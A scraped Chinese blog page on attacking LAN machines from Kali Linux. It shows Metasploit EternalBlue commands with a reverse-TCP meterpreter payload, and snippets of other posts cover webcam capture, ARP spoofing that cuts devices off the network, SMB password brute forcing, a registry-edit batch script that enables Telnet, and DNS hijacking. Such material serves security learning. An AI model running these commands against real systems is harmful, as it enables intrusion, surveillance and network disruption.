Kali渗透局域网机器

已于 2022-05-13 23:29:17 修改
阅读量1.6w 收藏 278
点赞数 19
CC 4.0 BY-SA版权
分类专栏: 渗透测试 信息安全 文章标签: 安全
于 2022-05-12 16:46:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40586270/article/details/124731052
本文介绍了如何在Kali Linux环境下利用msf工具进行局域网渗透测试,包括主机发现、端口扫描、服务识别、木马生成、监听配置以及后渗透操作。通过实验展示了从扫描目标到获取靶机控制权的完整过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、实验环境:

靶 机: windows10台式机(可以自己搭一个虚拟机,我这里用物理机做靶机):192.168.1.114
攻击机: kali虚拟机:192.168.1.116

二、msf工具基本用法:

msfconsole     #进入msf框架
search  相关漏洞(如search ms17_010)      # 使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue      # 使用use进入漏洞相关模块
info      #使用info查看模块信息
set payload windows/x64/meterpreter/reverse_tcp      #设置攻击载荷

最低0.47元/天 解锁文章

200万优质内容无限畅学
kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击
极歌科技
05-21 3万+
kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击 首先我们打开我们熟悉的kali linux操作系统,利用指令: ifconfig 来确认本机的ip地址 确认了本机的ip地址之后,利用一下的指令查看局域网下所有ip: fping -g 本机IP地址/24 如下图所示: 因为自己的小米手机也连接到了同...
入侵局域网电脑
Sunny
03-10 5174
方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文
局域网入侵
03-15
菜鸟学习局域网入侵!入门技术应用,适合所有新手。
kali渗透内网和外网
weixin_62693307的博客
04-17 6972
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网。
Kali远程控制win7摄像头
最新发布
muyuxiangzi的博客
06-10 149
set payload windows/x64/meterpreter/reverse_tcp(反向链接。set rhosts 192.168.0.103 对应攻击目标 (lhost是攻击kali。set rhosts 192.168.0.103(设置攻击目标。search ms17-010搜索微软17年出现的第十个漏洞。nmap 192.168.0.1/24查看整个网段的ip。webcam_list(列出可用摄像头。webcam_stream(视频监控。webcam_snap(拍照。
Kali Linux 学习日记6 - 局域网攻击
qq_46081990的博客
03-07 1810
1、交换机中有一个MAC地址表,里面是端口与MAC的对应。初始状态下,交换机的MAC地址表为空。 2、当局域网主机A与B欲通信时,A先向B发出ARP Request包请求B的MAC地址(广播),交换机某个接口收到A的ARP Request后,会自学习ARP中封装的源MAC和对应的端口号,并记录在MAC地址表中,然后交换机会向着除了源端口以外的所有端口泛洪,只有目的主机B会做ARP Response,然后交换机会继续自学习目的主机的MAC及其对应端口,记录在MAC地址表中。 3、当这两台主机再次通信时,交换
同一局域网下如何爆破另一台主机密码(kali和win2003为例)
wrypot的博客
04-01 2387
下面是重点选择协议,协议必须是刚刚扫描出来的端口里面包含的协议,这里可以用smb协议,因为刚刚扫描的时候,445端口是开启的,445端口用的是smb协议。192.168.132.131是kali自己,剩下的192.168.132.129极有可能是win2003。打开hydra-gtk 这是hydra的可视化界面,hydra是命令行模式。填写用户名Administrator,密码选一个字典,点击开始。第一步:先看自己当前网段192.168.132.0/24。nmap扫描 扫描目标服务的版本端口。
Kali渗透-NMAP高级使用技巧和漏洞扫描发现
Shmily17s的博客
11-19 1万+
4.1 NMAP高级使用技巧 4.1.1 NMAP概述 nmap可用于 检测活在网络上的主机 检测主机上开放的端口 检测到相应的端口的软件和版本 检测操作系统,硬件地址,以及软件版本 检测脆弱性的漏洞(nmap脚本) 4.1.2 NMAP端口状态解析 4.1.3 NMAP的语法及示例 nmap 可以扫内网,也可以扫描外网 直接使用nmap nmap 192.168.1.63 nmap ...
kali linux samba,Kali Linux 渗透测试:SMB、SMTP扫描工具(14)
weixin_35987446的博客
05-18 909
一、SMB扫描工具SMB(Server Message Block)协议,服务消息块协议。最开始是用于微软的一种消息传输协议,因为颇受欢迎,现在已经成为跨平台的一种消息传输协议。同时也是微软历史上出现安全问题最多的协议。它的实现复杂,并且默认在所有windows上开放。SMB常用的端口有两个139和445,较新的操作系统会使用445端口。1、nmap利用Nmap来扫描扫描某一网段上开启139或者...
Kali渗透—僵尸扫描
Shmily17s的博客
11-15 4544
2.5 僵尸扫描 2.5.1 什么是僵尸扫描 僵尸主机:僵尸主机是指感染僵尸病毒程序,从而被黑客程序控制的计算机设备。但是僵尸扫描中的僵尸主机指的是一个闲置的操作系统(闲置指主机不会主动和任何人通信),且此系统中IP数据包中ID是递增的。 IPID:指的是通信过程中,IP数据包中的ID。 僵尸扫描具有极高的隐蔽特性,但是实施条件苛刻。 目标网络可伪造源地址进行访问 选择僵尸主机,僵尸主机需要在互联上是一个闲置的操作系...
网络安全kali渗透学习 web渗透入门 DDOS的原理和防护
xueshenlaila的博客
02-15 2462
DDOS分布式拒绝服务攻击(英文意思是Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的,这类攻击称为分布式拒绝服务攻击,其中的攻击者可以有多个。 这篇文章教大家DDOS的原理和防护 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透kali基础命令使用等等等,非常多
如何入侵局域网
河北正定欢迎您-少占鱼
10-23 1310
如何入侵局域网- -                                          新建一个文本文档,内容如下:@echo REGEDIT4 > b.reg @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr] >> b.reg@echo "Start"=dword:00000002 >> b.
Kali ── ARP局域网断网攻击
hg666hh的博客
07-27 1081
第一步:攻击前的准备 环境: VMware,Kali linux、Win 7虚拟机一台 查看攻击者的设备信息 1.在Kali linux 终端下输入命令: ifconfig 从信息中可获取的攻击者的网卡是:eth0,IP地址是:192.168.188.130 2.在Kali linux 终端下输入命令: route -n 从信息中可获取到攻击者的网关是:192.168...
kali局域网(内网)arp攻击以及应用(一)
qq_39345447的博客
10-16 713
条件:假设已知一个ip,你与他在一个局域网 arp是根据IP地址获取物理地址的一个TCP/IP协议 攻击方式:arp攻击 使用工具:arpsoof arpspoof -i 网卡 -t 目标 IP 网关 需要: 使用自己自身的网卡 例如:eth0 目标ip 假设目标为192.168.1.100 受害网关 默认网关默认为主网关,这里为192.168.1.1 如何查看局域网中的IP? Fping -...
kali Linux对局域网内设备进行断网攻击
weixin_44686157的博客
07-19 4599
1.获取本机ip `ifconfig(获取本机局域网内ip) 2.获取目标ip` `nmap 192.168.1.0/24 3.获取网关 netstat -rn(输出的Gateway底下的就是网关,注意网关要与设备名相对应) 4.确保在arp欺骗后设备无法连接internet echo 0 >/proc/sys/net/ipv4/ip_forward(参数0是无法连接,1是允许连接) 5....
linux内网劫持教程,利用kali进行dns劫持入侵局域网
weixin_32953571的博客
05-10 4389
物理主机kali2.0 192.168.1.50目标主机:整个局域网运行msfconsole依次输入:use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //加载10_046浏览器漏洞模块setg SRVHOST 192.168.1.50 //设置全局服务主机IPset PAYLOAD windows/meterpreter/...
利用kali进行DOS/DDOS攻击(局域网内)(DHCP原理 ARP原理)
热门推荐
Firebasky的博客
04-30 2万+
1.什么是DOS/DDOS攻击? DOS:拒绝服务攻击(Deny Of Service) DDOS:DDOS攻击(Distributed denial of service attack) 一般来说DDOS攻击更难防御 自认为的区别:DOS是相当于一个进行攻击 而DDOS就是黑客控制了many肉鸡就是攻击 注:只是简单的了解,可以百度深入了解他们之间的区别 2.进入正题 kali攻击 a.tcp攻...
kali获取局域网内ip的mac地址 命令
04-02
<think>好的,我现在需要回答用户关于在Kali Linux中获取局域网内IP对应MAC地址的命令的问题。用户提到了arp-scan和nmap,可能还有其他工具。首先,我应该回忆这些工具的基本用法,并结合提供的引用资料来确保准确性。 首先,用户给出的引用中有提到arp-scan命令,比如引用[2]和引用[3]。特别是引用[2]中的例子是使用arp-scan并指定接口eth0。引用[4]提到nmap用于主机发现和端口扫描,包括UDP扫描。而用户需要的是获取IP和MAC的对应关系,所以可能需要ARP扫描或者使用nmap的主机发现功能。 接下来,我需要整理这些工具的典型用法。对于arp-scan,基本命令可能包括指定接口,如arp-scan -l,但可能需要sudo权限。引用[2]中的例子是arp-fingerprint -o "-I eth0" IP地址,但这里用户可能需要直接使用arp-scan命令,比如arp-scan --interface=eth0 --localnet。另外,nmap的-sn选项用于主机发现,不扫描端口,这样可以快速获取存活主机的IP和MAC,如nmap -sn 192.168.1.0/24。 还要注意权限问题,可能需要sudo。例如,arp-scan通常需要root权限,而nmap的某些扫描选项也可能需要。此外,用户可能想知道这些命令的输出结果如何展示IP和MAC地址。例如,arp-scan的输出会直接列出IP和MAC,而nmap的-sn扫描在结果中也会显示MAC地址,尤其是当扫描本地网络时。 另外,用户可能对arp命令本身有疑问,但arp命令只能显示缓存中的条目,可能不完整。因此推荐使用主动扫描的工具如arp-scan或nmap。 最后,根据引用[4],nmap的-sU是UDP扫描,但这里用户需要的是ARP扫描,所以可能更相关的是使用-sn或-Pn等选项。需要确保给出的命令示例正确,并引用正确的来源。例如,引用[4]提到使用nmap进行主机发现,所以可以引用该处。 现在需要将这些信息结构化,分点回答,确保每个工具的命令正确,并附上引用标记。同时生成相关问题,可能涉及其他工具或更详细的参数使用。</think>在Kali Linux中获取局域网内IP地址与MAC地址的映射关系,可通过以下工具实现: --- ### 1. **`arp-scan` 命令** **原理**:通过主动发送ARP请求包扫描局域网设备,直接获取IP和MAC地址的对应关系。 **基础命令**: ```bash sudo arp-scan --interface=eth0 --localnet ``` - `--interface=eth0`:指定网卡接口(如无线网卡可能是`wlan0`),需根据实际接口名调整[^2]。 - `--localnet`:自动识别当前局域网网段(如`192.168.1.0/24`),无需手动输入IP范围。 **示例输出**: ``` 192.168.1.1 00:11:22:33:44:55 Vendor Name 192.168.1.101 aa:bb:cc:dd:ee:ff Vendor Name ``` --- ### 2. **`nmap` 命令** **原理**:使用主机发现模式(`-sn`)发送ARP请求,探测存活主机并返回IP和MAC地址。 **基础命令**: ```bash sudo nmap -sn 192.168.1.0/24 ``` - `-sn`:仅执行主机发现,不扫描端口[^4]。 - `192.168.1.0/24`:指定扫描局域网子网,需根据实际网络调整。 **示例输出**: ``` Nmap scan report for 192.168.1.1 Host is up (0.0012s latency). MAC Address: 00:11:22:33:44:55 (Vendor Name) ``` --- ### 3. **`arp` 命令** **原理**:查看本地ARP缓存表(仅包含已通信设备的记录,可能不完整)。 **基础命令**: ```bash arp -a ``` **示例输出**: ``` _gateway (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0 ``` --- ### 对比与推荐 | 工具 | 优点 | 缺点 | |------------|-------------------------------|---------------------------| | `arp-scan` | 结果最全面,支持自定义参数 | 需手动安装(`apt install arp-scan`) | | `nmap` | 功能丰富,支持后续端口扫描 | 输出信息较复杂 | | `arp` | 无需额外安装 | 仅显示缓存记录,可能缺失 | --- ### 注意事项 - **权限**:`arp-scan`和`nmap`通常需要`sudo`权限[^2]。 - **接口选择**:若未指定接口(如`eth0`),可能因默认网卡错误导致扫描失败。 ---
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值